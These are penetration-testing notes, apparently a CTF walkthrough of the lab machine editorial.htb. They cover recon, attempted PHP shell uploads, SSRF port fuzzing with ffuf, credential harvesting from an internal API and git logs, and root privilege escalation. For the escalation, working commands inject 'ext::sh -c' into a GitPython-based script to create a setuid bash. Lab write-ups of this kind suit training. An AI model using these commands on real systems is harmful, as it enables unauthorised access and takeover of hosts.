# Lessons Learned
- If a website allows us to enter a URL
- Test pulling a file from Kali http server
- Test SSRF by pulling file from `http://127.0.0.1:80` and other ports
- `ffuf` has the `-ac` flag that auto-filters responses
- we can also use the `-request` flag with `ffuf` like `sqlmap -r`
- when sending a POST request, we can change boundary tags between firefox and chromium to observe different behavior
- also we can strip out a lot of unnecessary headers
- NOTEL spacing and newlines matter in POST requests > pay close attention
---
# After-Action Attack Sequence
- BLUF: xxx
- xxx
---
# Discover Ports & Services
- `ping` test![[images/Pasted image 20260712151059.png]]
- `nmap` scan - light![[images/Pasted image 20260712151113.png]]
- `nmap` scan - detailed ![[images/Pasted image 20260712151227.png]]
- `nmap` scan - UDP![[images/Pasted image 20260712151507.png]]
---
# Port 80 (HTTP): nginx 1.18.0
## Initial Enum
- visit page ![[images/Pasted image 20260712151555.png]]
- `request:response` in burp![[images/Pasted image 20260712151621.png]]
- `robots.txt` > 404
- `sitemap.xml` > 404
- `index.html` > 404
- `index.php` > 404
- rando page > 404
- response headers ![[images/Pasted image 20260712151740.png]]
- methods![[images/Pasted image 20260712151745.png]]
- `whatweb` scan ![[images/Pasted image 20260712151820.png]]
- `/upload` looks very interesting ![[images/Pasted image 20260712151834.png]]
## Fuzzing
- directory ![[images/Pasted image 20260712153205.png]]
- subdomains![[images/Pasted image 20260712153458.png]]
- vhosts ![[images/Pasted image 20260712153535.png]]
## `/upload`
- test upload with random `.txt` file ![[images/Pasted image 20260712152111.png]]
- `request:response` in burp > POST request ![[images/Pasted image 20260712152140.png]]
- i dont see the `.txt` file in this POST form
- try `preview` button for upload mechanism > ahh ![[images/Pasted image 20260712152407.png]]
- shows the text of the file in the reqeust and the upload location in the response
- there is an immediate GET request that follows the POST, but I cannot visit the upload location afterwards ![[images/Pasted image 20260712153014.png]]
- `nuceli` scan ![[images/Pasted image 20260712154030.png]]
- `sqlmap` on `/upload` ![[images/Pasted image 20260712154201.png]]
- since `nuceli` shows that a WAF may be in play, run again
```bash
sqlmap -r upload.req --batch --tamper=space2comment --random-agent
```
![[images/Pasted image 20260712154259.png]]
## `/upload-cover`
### php revshell
- try to upload below php revshell ![[images/Pasted image 20260712154611.png]]
- POST ![[images/Pasted image 20260712154754.png]]
- GET ![[images/Pasted image 20260712154746.png]]
- no hit on listener
### php webshell
- try to upload below php webshell ![[images/Pasted image 20260712154923.png]]
- when i go to interact with the uploaded file I get the webshell back ![[images/Pasted image 20260712155053.png]]
- either the php extension is being stripped (likely because none of the pages show up as `.php` or the upload location does not allow script execution
### SSRF
#### test
- first, try to pull a file from Kali
- setup HTTP server on Kali and host a test file
```bash
touch text
python3 -m http.server
```
- now in the URL field enter: `http://10.10.14.173:8000/text`
- we have a hit on our HTTP server ![[images/Pasted image 20260712193924.png]]
#### localhost
- try localhost on target
- we are getting different behavior in response ![[images/Pasted image 20260712194117.png]]
- try `127.0.0.1:80` ![[images/Pasted image 20260712194222.png]]
##### `intruder`
- now let's loop over ports with `intruder`![[images/Pasted image 20260712194652.png]]
- man this is SLOW because we dont have brup pro ![[images/Pasted image 20260712195203.png]]
- NOTE: `intruder` only got to port 351 while i was doing the below steps with `ffuf`
##### `ffuf`
- while waiting on the above, lets use `ffuf`
- setup a word list and a POST `.req` file
```bash
printf "%s\n" {1..10000} > numbers.txt
```
![[images/Pasted image 20260712195740.png]]
```bash
POST /upload-cover HTTP/1.1
Host: editorial.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=----geckoformboundaryebaeace69c42ccc6aa59ffe1eba354bd
Content-Length: 354
Origin: http://editorial.htb
Connection: keep-alive
Referer: http://editorial.htb/upload
Priority: u=0
------geckoformboundaryebaeace69c42ccc6aa59ffe1eba354bd
Content-Disposition: form-data; name="bookurl"
http://127.0.0.1:FUZZ
------geckoformboundaryebaeace69c42ccc6aa59ffe1eba354bd
Content-Disposition: form-data; name="bookfile"; filename="text"
Content-Type: application/octet-stream
------geckoformboundaryebaeace69c42ccc6aa59ffe1eba354bd--
```
- run the `ffuf` command
```bash
ffuf -u http://editorial.htb/upload-cover -request upload-cover.post.req -w numbers.txt -ac
```
- not getting anything ![[images/Pasted image 20260712201512.png]]
- let's remove unnecessary headers from our POST request give it boundary markers associated with the chromium browser
```bash
POST /upload-cover HTTP/1.1
Host: editorial.htb
Content-Type: multipart/form-data; boundary=---------------------------17227051210845347502863409435
-----------------------------17227051210845347502863409435
Content-Disposition: form-data; name="bookurl"
http://127.0.0.1:FUZZ
-----------------------------17227051210845347502863409435
Content-Disposition: form-data; name="bookfile"; filename=""
Content-Type: application/octet-stream
-----------------------------17227051210845347502863409435--
```
- now we got a hit on port 5000 ![[images/Pasted image 20260712201542.png]]
##### interact with port 5000
- we have a different output in the response ![[images/Pasted image 20260712202225.png]]
- hit this page with `curl` ![[images/Pasted image 20260712202420.png]]
- we are getting some json output
- throw into a file and pipe to `jq` ![[images/Pasted image 20260712202445.png]]
- start `curl`-ing these API endpoints ![[images/Pasted image 20260712202714.png]]
- oh right this is only on localhost
- instead, let's append these API endpoints to `http://127.0.0.1:5000` ![[images/Pasted image 20260712203507.png]]
- then `curl` the new upload ![[images/Pasted image 20260712203529.png]]
- more json output ![[images/Pasted image 20260712203624.png]]
- we have creds for `dev`
---
# shell as `dev`
- we cannot use `sudo` as `dev`, but we see user `prod` is named `Alirio Acosta` ![[images/Pasted image 20260712204017.png]]
- networking ![[images/Pasted image 20260712204053.png]]
- `/home/dev/apps` has `.git`
- look at logs ![[images/Pasted image 20260712204423.png]]
- instead run: `git log -p`
- we have creds for `prod`
---
# shell as `prod`
## initial enum
- initial enum ![[images/Pasted image 20260712205507.png]]
- we can run a python script as root
- let's review the script![[images/Pasted image 20260712205632.png]]
- review script's dir ![[images/Pasted image 20260712210031.png]]
- we can write to this dir
## privsec
- try this command sequence
```bash
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c cp /bin/bash% /tmp/% &&% chmod% +s% /tmp/rootbash"
/tmp/rootbash -p
```
- not working
- after some more Googling we find [Remote Code Execution (RCE) in gitpython | CVE-2022-24439 | Snyk](https://security.snyk.io/vuln/SNYK-PYTHON-GITPYTHON-3113858)
- based on this try the below command
```bash
sudo python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c touch% /tmp/pwned2"
```
- that created `/tmp/pwnd2` owner by root
- let's try to break the above `rootbash` command into parts
```bash
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c cp% /bin/bash% /tmp/rootbash2"
sudo /usr/bin/python3 /opt/internal_apps/clone_changes/clone_prod_change.py "ext::sh -c chmod% +s% /tmp/rootbash2"
/tmp/rootbash2 -p
```
- that worked! ![[images/Pasted image 20260712214839.png]]